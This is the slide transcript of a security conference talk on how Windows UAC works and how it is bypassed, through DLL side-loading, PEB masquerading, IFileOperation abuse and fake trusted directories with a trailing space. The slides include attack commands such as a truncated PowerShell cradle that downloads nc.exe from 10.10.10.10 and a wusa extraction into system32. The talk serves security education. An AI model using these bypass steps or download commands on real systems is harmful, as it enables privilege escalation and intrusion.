Upgrade to Pro — share decks privately, control downloads, hide ads and more …

SITCON: Playing Win32 Like a K!NG ;)

adr
August 08, 2020

SITCON: Playing Win32 Like a K!NG ;)

在 Windows Vista 後作業系統內置了 UAC(User Account Control)防護,本來應被視為其中一項相當重要的惡意程式防護、替我們擋下未知的惡意程式做出的惡意手段。然而現實慘狀卻告訴我們:UAC 服務只是一個惱人要求使用者同意的彈窗設計、而未能擋下數不盡的惡意程式攻擊。

在這場議程中,將簡介微軟在 Windows 上防護體系的馬其諾防線、Win32 Process 裝載特性、逆向工程分析 UAC 實作細節、微軟設計 UAC 時作出的安全考量假設 與 各個大神是怎麼玩爆你的 UAC 防護的。

sysDoor: gist.github.com/aaaddress1/6c4276155104a5b7df9ab15221c91f69

adr

August 08, 2020
Tweet

More Decks by adr

Other Decks in Technology

Transcript

  1. 2020
    (New-Object
    System.Net.WebClient).Dow
    /10.10.10.10/nc.exe","nc.ex
    PS C:\>
    [System.Convert]::ToBase64Strin
    ext.Encoding]::UTF8.Ge
    414141414141414141
    AAAAAAAAAA
    SITCON
    cmd.exe
    /c
    "d
    Playing Win32
    Like a K!NG ;)
    [email protected]

    View full-size slide

  2. #Windows #Reversing #Pwn #Exploit
    $man
    • Master degree at CSIE, NTUST
    • Security Researcher - chrO.ot
    • Speaker - BlackHat, DEFCON, VXCON, HITCON
    [email protected]
    • Hao's Arsenal

    View full-size slide

  3. [email protected]
    1. UAC Design
    2. Exploit Attacks
    1. Misc Method
    2. CIA Vault7: Elevated COM Object Method
    3. UAC Bypass by Mocking Trusted Directories
    3. Recap
    /?outline

    View full-size slide

  4. syscall
    Ring0
    Ring3
    Explorer
    (A.) RunAs UAC Service
    (B.) Send a task by RPC message to
    UAC service for creating a different
    privilege child process
    RPC
    trust_authA consent.exe
    privileged
    child process
    trust_authB

    View full-size slide

  5. [email protected]
    • TrustAuth_A # trust path verify
    - $p = ToDosName("C:\\a.exe") # \??\C:\a.exe
    - $p.startswith(\??\C:\Windows\System32) or
    $p.startswith(\??\C:\Windows\SysWoW64)
    - deny-list
    /?auth_a

    View full-size slide

  6. [email protected]
    • TrustAuth_B
    - whitelisted *.exe with M$ signature
    - or AutoElevate marked as TRUE in
    manifest.xml
    /?auth_b

    View full-size slide

  7. [email protected]
    /?Bypass
    • UAC: 朕不給的,你拿不⾛!
    • TrustAuth_A # binary from the trusted zone?
    A. launched from the system directory
    B. whitelisted + signed by M$
    • TrustAuth_B # should be elevated?
    C. marked as auto-elevated or whitelisted
    PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
    所以現在...
    我們有⼀份
    好棒棒⽬標名單

    View full-size slide

  8. [email protected]
    • Misc: 在野奇技淫巧系列✨
    • CIA: Elevated COM Object Method
    • Mocking Trusted Directories
    /?attack

    View full-size slide

  9. [email protected]
    /?misc#1
    Accessing Access Tokens for UIAccess
    www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
    幫你⾃動按確定︖
    舉⼿之勞啦

    View full-size slide

  10. [email protected]
    /?misc#2
    • 那我們能讓⾼權服務直接呼叫我們嗎
    • Bypassing UAC on Windows10 using Disk Cleanup
    enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup

    View full-size slide

  11. [email protected]
    /?misc#3
    • 解壓縮直接把系統程式檔案蓋掉
    $ wusa hack.cab /extract: C:\windows\system32
    msitpros.com/?p=3100

    View full-size slide

  12. [email protected]
    'PE'
    Opt Header
    .text
    .EntryPoint
    .ImageBase
    Section Data
    .rdata .idata
    a.exe
    Process
    PEB
    PE
    Module
    ntdll.dll
    VERSION.dll
    user32.dll
    ...
    LoadLibrary()
    $PATH: {
    "C:\hijack\VERSION.dll",
    "C:\Windows\System32\VERSION.dll",
    "C:\Windows\SysWoW64\VERSION.dll",
    ...
    }
    C:\hijack\a.exe
    /?hijack

    View full-size slide

  13. [email protected]
    • DLL Side-Loading
    → to hijack auto-elevated windows services by drop a
    malicious *.dll binary
    • IFileOperation
    → file arbitrary writing if you're Explorer
    → drop *.dll into C:\windows\system32 to hijack
    • DLL Injection
    → do things as Explorer
    https://github.com/hjc4869/UacBypass
    /?bypass#1

    View full-size slide

  14. malware system32\cliconfg.exe
    /?bypass#1
    explorer.exe
    Process
    ntdll.dll
    kernel32.dll
    user32.dll
    malware.dll
    (a.) inject *.dll module
    (b.) create a
    new thread to wake
    malware up
    (c.) drop a *.dll
    into %system32%
    to hijack service
    (d.) get privileged
    by dll hijack

    View full-size slide

  15. [email protected]
    • 更動 Windows 註冊序號
    →駭客可以幫你安裝正版的 Windows!
    • 執⾏磁碟管理⼯具
    →電腦跑很慢電腦垃圾太多︖駭客幫你磁碟重整⼀下
    • 幫你移除防毒軟體
    →覺得防毒讓電腦跑很慢︖沒關係駭客幫你刪掉 (⁎⁍̴̛ᴗ⁍̴̛⁎)
    • 寫入開機啟動項
    →駭客可以植入開機⾃動執⾏的後⾨ watch after you ;)
    /?bypass4what

    View full-size slide

  16. [email protected]
    'PE'
    Opt Header
    .text
    .EntryPoint
    .ImageBase
    Section Data
    .rdata .idata
    Source.cpp
    Compiler
    'MZ'
    Opt Header
    ImageBase
    .text
    .rdata
    .idata
    Process
    Application
    Loader
    EntryPoint
    PEB
    "C:\Windows\explorer.exe"
    PE
    Module
    /?MasqueradePEB

    View full-size slide

  17. [email protected]
    • DLL Side-Loading
    → to hijack auto-elevated windows services by drop a
    malicious *.dll binary
    • IFileOperation + MasqueradePEB
    → file arbitrary writing as Explorer
    → drop *.dll into C:\windows\system32 to hijack
    /?bypass#2

    View full-size slide

  18. malware system32\cliconfg.exe
    /?bypass#1
    explorer.exe
    Process
    ntdll.dll
    kernel32.dll
    user32.dll
    malware.dll
    (a.) inject *.dll module
    (b.) create a
    new thread to wake
    malware up
    (c.) drop a *.dll
    into %system32%
    to hijack service
    (d.) get privileged
    by dll hijack

    View full-size slide

  19. system32\cliconfg.exe
    /?bypass#2
    malware.exe
    Process
    ntdll.dll
    kernel32.dll
    user32.dll
    (a.) Masquerade current
    path as explorer.exe
    (b.) drop a *.dll into %system32%
    to hijack service
    (c.) get privileged
    by dll hijack
    PEB "C:\Windows\explorer.exe"

    View full-size slide

  20. [email protected]
    Vault 7: CIA Hacking Tools Revealed
    /?WikiLeaks
    wikileaks.org/ciav7p1/cms/page_3375231.html

    View full-size slide

  21. [email protected]
    /?IFileOperation
    http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

    View full-size slide

  22. [email protected]
    /?IFileOperation
    http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

    View full-size slide

  23. [email protected]
    /?IFileOperation
    http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

    View full-size slide

  24. [email protected]
    Vault 7: CIA Hacking Tools Revealed
    /?WikiLeaks
    wikileaks.org/ciav7p1/cms/page_3375231.html
    M$ patched this vulnerability after Win10 version 1607
    (include known *.dll lead to hijack)

    View full-size slide

  25. [email protected]
    Vault 7: CIA Hacking Tools Revealed
    /?WikiLeaks
    wikileaks.org/ciav7p1/cms/page_3375231.html
    M$ patched this vulnerability after Win10 version 1607
    (include known *.dll lead to hijack)

    View full-size slide

  26. [email protected]
    〉〉〉Mocking Directory

    View full-size slide

  27. syscall
    Ring0
    Ring3
    Explorer
    (A.) RunAs UAC Service
    (B.) Send a task by RPC message to
    UAC service for creating a different
    privilege child process
    RPC
    trust_authA consent.exe
    privileged
    child process
    trust_authB

    View full-size slide

  28. [email protected]
    /?Bypass
    • UAC: 朕不給的,你拿不⾛!
    • TrustAuth_A # binary from the trusted zone?
    A. launched from the system directory
    B. whitelisted + signed by M$
    • TrustAuth_B # should be elevated?
    C. marked as auto-elevated or whitelisted
    PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
    所以現在...
    我們有⼀份
    好棒棒⽬標名單

    View full-size slide

  29. [email protected]
    $ mkdir "C:\Windows \"
    $ mkdir "C:\Windows \System32"
    /?DACL

    View full-size slide

  30. [email protected]
    • TrustAuth_A # trust path verify
    - $p = ToDosName("C:\\a.exe") # \??\C:\a.exe
    - $p.startswith(\??\C:\Windows\System32) or
    $p.startswith(\??\C:\Windows\SysWoW64)
    - deny-list
    /?auth_a

    View full-size slide

  31. [email protected]
    RtlDosPathNameToRelativeNtPathName_U_WithStatus(
    GetLongPathNameW(L"C:\Windows \System32\a.exe")
    )
    RtlDosPathNameToRelativeNtPathName_U_WithStatus(
    L"C:\Windows\System32\a.exe"
    )
    $p = L"\??\C:\Windows\System32\a.exe"
    /?auth_a
    AiLaunchProcess(L"C:\Windows \System32\a.exe")

    View full-size slide

  32. [email protected]
    • TrustAuth_A
    - Path Normalization Issues
    • TrustAuth_B
    - Whitelisted EXE Files with Trusted Signature
    - AutoElevated Marked EXE Files
    → DLL Side-Loading Tricks to hijack windows services
    • UAC Bypass by Mocking Trusted Directories
    /?attack

    View full-size slide

  33. [email protected]
    /?HITCON
    www.youtube.com/watch?v=6LUo-Crd9pc

    View full-size slide

  34. [email protected]
    • UAC Design
    - auth_a: *.exe launched from the system
    - auth_b: marked as AutoElevated
    • Bypass Tricks
    - Issue: IFileOperation, Path Normalization
    - DLL Side-Loading
    - Code Inject / MasqueradePEB
    - DEFCON 25: UAC 0day, all day! by @FuzzySec
    /?recap

    View full-size slide









  35. 情報滲透




    PS C:\>
    [System.Convert]::ToBase64String([Sy
    ext.Encoding]::UTF8.GetByte
    cmd.exe
    /c
    "dir"
    414141414141414141
    AAAAAAAAAAAAAAAAAAAAAA
    [email protected]
    遠程後⾨
    網軍⾏動
    Thanks!
    Slide
    Github @aaaddress1
    Facebook

    View full-size slide